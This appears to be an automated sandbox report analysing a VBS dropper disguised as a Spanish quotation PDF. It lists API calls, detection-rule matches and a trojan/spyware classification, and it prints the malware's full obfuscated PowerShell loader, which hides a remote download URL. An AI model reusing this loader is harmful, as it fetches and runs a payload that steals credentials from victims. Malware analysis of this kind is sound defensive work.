              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E93090 NtSetValueKey,16_2_02E93090
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E93010 NtOpenDirectoryObject,16_2_02E93010
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E92AB0 NtWaitForSingleObject,16_2_02E92AB0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E92BE0 NtQueryValueKey,16_2_02E92BE0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E92BF0 NtAllocateVirtualMemory,16_2_02E92BF0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E92BA0 NtEnumerateValueKey,16_2_02E92BA0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E92B80 NtQueryInformationFile,16_2_02E92B80
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E92EA0 NtAdjustPrivilegesToken,16_2_02E92EA0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E92E80 NtReadVirtualMemory,16_2_02E92E80
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E92E30 NtWriteVirtualMemory,16_2_02E92E30
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E92FA0 NtQuerySection,16_2_02E92FA0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E92F90 NtProtectVirtualMemory,16_2_02E92F90
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E92F60 NtCreateProcessEx,16_2_02E92F60
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E92CF0 NtOpenProcess,16_2_02E92CF0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E92CC0 NtQueryVirtualMemory,16_2_02E92CC0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E92C00 NtQueryInformationProcess,16_2_02E92C00
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E92DB0 NtEnumerateKey,16_2_02E92DB0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E93D70 NtOpenThread,16_2_02E93D70
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E92D00 NtSetInformationFile,16_2_02E92D00
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E93D10 NtOpenProcessToken,16_2_02E93D10
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_003D93C0 NtCreateFile,16_2_003D93C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_003D9530 NtReadFile,16_2_003D9530
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_003D9620 NtDeleteFile,16_2_003D9620
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_003D96C0 NtClose,16_2_003D96C0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF7C817BF664_2_00007FF7C817BF66
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF7C817CD124_2_00007FF7C817CD12
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_047DE6A89_2_047DE6A8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_047DEF789_2_047DEF78
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_047DE3609_2_047DE360
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_075AB4D89_2_075AB4D8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FB4FFB113_2_1FB4FFB1
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FA91F9213_2_1FA91F92
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FA9CFE013_2_1FA9CFE0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FA82FC813_2_1FA82FC8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FAD2F2813_2_1FAD2F28
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FAB0F3013_2_1FAB0F30
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_00E158EE14_2_00E158EE
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_00E138CE14_2_00E138CE
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_00E1C0D914_2_00E1C0D9
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_00E1C0DE14_2_00E1C0DE
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_00E1A82E14_2_00E1A82E
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_00E13A1314_2_00E13A13
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_00E13A1E14_2_00E13A1E
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_00E3457E14_2_00E3457E
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_00E156C514_2_00E156C5
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_00E156CE14_2_00E156CE
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_00E1DEDE14_2_00E1DEDE
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_0480EC2514_2_0480EC25
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_0480EC2E14_2_0480EC2E
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_0481743E14_2_0481743E
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_0480CE2E14_2_0480CE2E
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_0481563914_2_04815639
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_0481563E14_2_0481563E
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_0480EE4E14_2_0480EE4E
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_0480CF7314_2_0480CF73
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_0480CF7E14_2_0480CF7E
              Source: C:\Program Files (x86)\OhoBWlSxhIqejVVqpldRKmsWGuyLbLBfjVnqArMMvujIwbnbhGLxPp\mAV1geIoraZWu3gOV6nu2g.exeCode function: 14_2_0482DADE14_2_0482DADE
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F012ED16_2_02F012ED
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E7B2C016_2_02E7B2C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E652A016_2_02E652A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F0027416_2_02F00274
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F203E616_2_02F203E6
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E6E3F016_2_02E6E3F0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EA739A16_2_02EA739A
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F1A35216_2_02F1A352
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4D34C16_2_02E4D34C
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F1132D16_2_02F1132D
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F1F0E016_2_02F1F0E0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F170E916_2_02F170E9
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E670C016_2_02E670C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F0F0CC16_2_02F0F0CC
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F181CC16_2_02F181CC
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E6B1B016_2_02E6B1B0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F201AA16_2_02F201AA
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E9516C16_2_02E9516C
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E4F17216_2_02E4F172
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F2B16B16_2_02F2B16B
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E5010016_2_02E50100
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EFA11816_2_02EFA118
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E7C6E016_2_02E7C6E0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F116CC16_2_02F116CC
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E5C7C016_2_02E5C7C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F1F7B016_2_02F1F7B0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E6077016_2_02E60770
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E8475016_2_02E84750
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F0E4F616_2_02F0E4F6
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E5146016_2_02E51460
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F1244616_2_02F12446
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F1F43F16_2_02F1F43F
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EFD5B016_2_02EFD5B0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F2059116_2_02F20591
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F1757116_2_02F17571
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E6053516_2_02E60535
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F0DAC616_2_02F0DAC6
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EFDAAC16_2_02EFDAAC
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EA5AA016_2_02EA5AA0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E5EA8016_2_02E5EA80
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED3A6C16_2_02ED3A6C
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F17A4616_2_02F17A46
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F1FA4916_2_02F1FA49
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E9DBF916_2_02E9DBF9
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F16BD716_2_02F16BD7
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E7FB8016_2_02E7FB80
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F1FB7616_2_02F1FB76
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F1AB4016_2_02F1AB40
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E638E016_2_02E638E0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E8E8F016_2_02E8E8F0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E468B816_2_02E468B8
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E6284016_2_02E62840
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E6A84016_2_02E6A840
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E629A016_2_02E629A0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F2A9A616_2_02F2A9A6
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E7696216_2_02E76962
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E6995016_2_02E69950
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E7B95016_2_02E7B950
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F1EEDB16_2_02F1EEDB
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E69EB016_2_02E69EB0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F1CE9316_2_02F1CE93
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E72E9016_2_02E72E90
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E60E5916_2_02E60E59
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F1EE2616_2_02F1EE26
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E6CFE016_2_02E6CFE0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E52FC816_2_02E52FC8
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F1FFB116_2_02F1FFB1
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E61F9216_2_02E61F92
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED4F4016_2_02ED4F40
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02EA2F2816_2_02EA2F28
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E80F3016_2_02E80F30
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F1FF0916_2_02F1FF09
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F1FCF216_2_02F1FCF2
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E50CF216_2_02E50CF2
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F00CB516_2_02F00CB5
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02ED9C3216_2_02ED9C32
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E60C0016_2_02E60C00
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E5ADE016_2_02E5ADE0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E7FDC016_2_02E7FDC0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E78DBF16_2_02E78DBF
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F17D7316_2_02F17D73
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E63D4016_2_02E63D40
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02F11D5A16_2_02F11D5A
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E6AD0016_2_02E6AD00
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_003C1F9016_2_003C1F90
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_003BB03016_2_003BB030
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_003BD05016_2_003BD050
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_003BB17516_2_003BB175
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_003BB18016_2_003BB180
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_003C564016_2_003C5640
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_003C383B16_2_003C383B
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_003C384016_2_003C3840
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_003DBCE016_2_003DBCE0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_003BCE3016_2_003BCE30
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_003BCE2716_2_003BCE27
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02C854C416_2_02C854C4
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02C7E49416_2_02C7E494
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02C7E5B316_2_02C7E5B3
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02C7DA1816_2_02C7DA18
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02C7E94C16_2_02C7E94C
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02C7CCB316_2_02C7CCB3
              Source: C:\Windows\SysWOW64\findstr.exeCode function: String function: 02E4B970 appears 266 times
              Source: C:\Windows\SysWOW64\findstr.exeCode function: String function: 02E95130 appears 36 times
              Source: C:\Windows\SysWOW64\findstr.exeCode function: String function: 02ECEA12 appears 84 times
              Source: C:\Windows\SysWOW64\findstr.exeCode function: String function: 02EDF290 appears 105 times
              Source: C:\Windows\SysWOW64\findstr.exeCode function: String function: 02EA7E54 appears 88 times
              Source: SOLICITUD DE COTIZACI#U00d3N(UG) 03-10-2025#U00b7pdf.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5803
              Source: unknownProcess created: Commandline size = 5803
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5803Jump to behavior
              Source: amsi64_1488.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_7704.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 1488, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7704, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@18/8@5/4
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Linieskifte.RigJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7656:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1296:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bgbsoe3j.toz.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOLICITUD DE COTIZACI#U00d3N(UG) 03-10-2025#U00b7pdf.vbs"
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process Where Name = 'explorer.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1488
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7704
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: findstr.exe, 00000010.00000002.2572965729.0000000000915000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000010.00000003.2422450974.0000000000915000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000010.00000002.2572965729.0000000000941000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000010.00000002.2572965729.000000000091E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: SOLICITUD DE COTIZACI#U00d3N(UG) 03-10-2025#U00b7pdf.vbsVirustotal: Detection: 9%
              Source: SOLICITUD DE COTIZACI#U00d3N(UG) 03-10-2025#U00b7pdf.vbsReversingLabs: Detection: 13%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOLICITUD DE COTIZACI#U00d3N(UG) 03-10-2025#U00b7pdf.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657e
              Source: C:\Windows\System32\PING.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sirupperne; function Rundingers($Frygtet){$Totalafholdsmndenes=4;do{$Utopographer+=$Frygtet[$Totalafholdsmndenes];$Totalafholdsmndenes+=5;$Floss=Format-List} until(!$Frygtet[$Totalafholdsmndenes])$Utopographer}function Exaltative($Skriv){ .($Monoprionidian) ($Skriv)}$Gylpenes=Rundingers ',endNMed E RaaTBrug.fronw';$Gylpenes+=Rundingers 'Timee ,rsbLderCLng lTranI AsseP stN Envt';$Gensidige=Rundingers 'D ciM BidoBiblz FriiE.ecl La.l Fera ha /';$Turf=Rundingers 'bjniTBaldl dogsLand1Ecty2';$Dopingens='Rens[C ten P oe ddatPrea. B,dSTopdER harPhilV haIServCTidseMantpAlano.ervi ndiNRebetAbdimHallas,emn OvoaHis.gAr.iE VikR.wel]Heat: Nem:unshsVerseReklcDe.ruSkonR,edsIChazTexscYBritP r.vrthumOFla t GitoAnaucGlobOAfkol,ept=inte$Su,ktspa.uSkrmrlockF';$Gensidige+=Rundingers 'Beha5Fold. Ste0,ive fors(AktiW estiUdflnDoktdSansoUndsw apas Til AfklN He TSyne Vejn1Dist0Neos.Deka0Li j; Ret KlebWPupiiEloknYayb6F uo4Mark;Tart m.ttxSpor6Loc 4Vite;U do Lystr Sa,vLab,:Prod1Come3Mant4Ra e.Bomb0sani)En a Leg G KaveUb,tcAngrk Insopor./.rea2Macr0Str,1U,de0Supe0Zinc1Yach0Bred1alab R tFTikhiHurtr riheNordf ongoLastxLgtn/H,pn1S.rp3Unde4Urin.Grad0';$Mellemtekst=Rundingers 'freuu nisDaraeSuper S.l-UdslAimprG DisE KronNoniT';$Afskrabede=Rundingers 'Per.hKbintK,ittpolipAn esH,nd:Band/Opda/Pawkd SkarTraniAporv ampeElem.kpengResto eneo kokgeaenlSporeNonf.CopucKer oResemPre /DepiuRececpret?SkaaeSym,xBugbp OraoAdvorBakstHect= L.sdSc ooS xewGenen Ab lUpstoVagiaRed dPaup&Kvi iPsaldMiss= Dag1 BedGFlakfbourxS re5Antac ,rucSt gU Da.z RicPChr qArc 6H peETra R.kviGVallr UnfOKortqTeknCSnitKEnsi4 AnasR gnKIrefqRverR Ulig AfgyFlaa9KalkUEmu w t,r6Bixb8Hjor4';$Pyrotoxin=Rundingers ' Gas>';$Monoprionidian=Rundingers ' debITheoE fo,X';$Underbevelling='Hestestutterier';$Thyrostraca='\Linieskifte.Rig';Exaltative (Rundingers ' S.j$chemgKroplInciOraspBSadeASg.nlIm.r: PendMisteSkrinUnsyU AbsdSietiUncoNBrinGMagn=.mpr$ AdveBregnAjugvS or:Sek aFlamp Genp urgdLystaElecT .araTing+Loch$MusitDik,H BufYSp dRSterORigtSBreftDrt RDelfAI ric ad.a');Exaltative (Rundingers ' for$ atugByggL pulOTil BS riAFroklcit :,abaD arpOYau.mGenaiLsn,N oiniB ctkGelda ,liNSys s m fkPusheFl v=Hexa$Vap aK llfSmaaSRu dKSjleRJazzAUnlyBHoveEkonfdTilsetric.SekssAd,lPStilLRotuiMelaTa,ti(Bejl$NevyPMarkY lacRStero UgetD leo BalxMutai U cndelt)');Exaltative (Rundingers $Dopingens);$Afskrabede=$Dominikanske[0];$tobiser=(Rundingers 'di,t$LandGReseLArchoIsaaBImp AAlarLF ee: OutaSpi H ilfMboelE,koldOlefS Inv=ChaiNTackE OrdWjg r- EuaodegrB SolJFykeECleaCjdertArki P ess nnoY.ktas hotFaseE Vidm Gl .Cum $murpgKlu YGaloLBaluPgenseSystNFor eTaros');Exaltative ($tobiser);Exaltative (Rundingers ' .ng$ mea s ihNajem Le eUdvedBoulsMa.r.DisiHS rae U gaFlatdRes eindtr StosSolm[Pasc$ Di MTekneUnrel Scrl Re eObelmGodst Ch.e Hypk PresUndetC jo] Ada=Hold$BowlGSvejeAbonn .ers W.tiRaindProji JusgMidde');$Siwash=Rundingers 'Prv,$V,ssaZoo
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Sirupperne; function Rundingers($Frygtet){$Totalafholdsmndenes=4;do{$Utopographer+=$Frygtet[$Totalafholdsmndenes];$Totalafholdsmndenes+=5;$Floss=Format-List} until(!$Frygtet[$Totalafholdsmndenes])$Utopographer}function Exaltative($Skriv){ .($Monoprionidian) ($Skriv)}$Gylpenes=Rundingers ',endNMed E RaaTBrug.fronw';$Gylpenes+=Rundingers 'Timee ,rsbLderCLng lTranI AsseP stN Envt';$Gensidige=Rundingers 'D ciM BidoBiblz FriiE.ecl La.l Fera ha /';$Turf=Rundingers 'bjniTBaldl dogsLand1Ecty2';$Dopingens='Rens[C ten P oe ddatPrea. B,dSTopdER harPhilV haIServCTidseMantpAlano.ervi ndiNRebetAbdimHallas,emn OvoaHis.gAr.iE VikR.wel]Heat: Nem:unshsVerseReklcDe.ruSkonR,edsIChazTexscYBritP r.vrthumOFla t GitoAnaucGlobOAfkol,ept=inte$Su,ktspa.uSkrmrlockF';$Gensidige+=Rundingers 'Beha5Fold. Ste0,ive fors(AktiW estiUdflnDoktdSansoUndsw apas Til AfklN He TSyne Vejn1Dist0Neos.Deka0Li j; Ret KlebWPupiiEloknYayb6F uo4Mark;Tart m.ttxSpor6Loc 4Vite;U do Lystr Sa,vLab,:Prod1Come3Mant4Ra e.Bomb0sani)En a Leg G KaveUb,tcAngrk 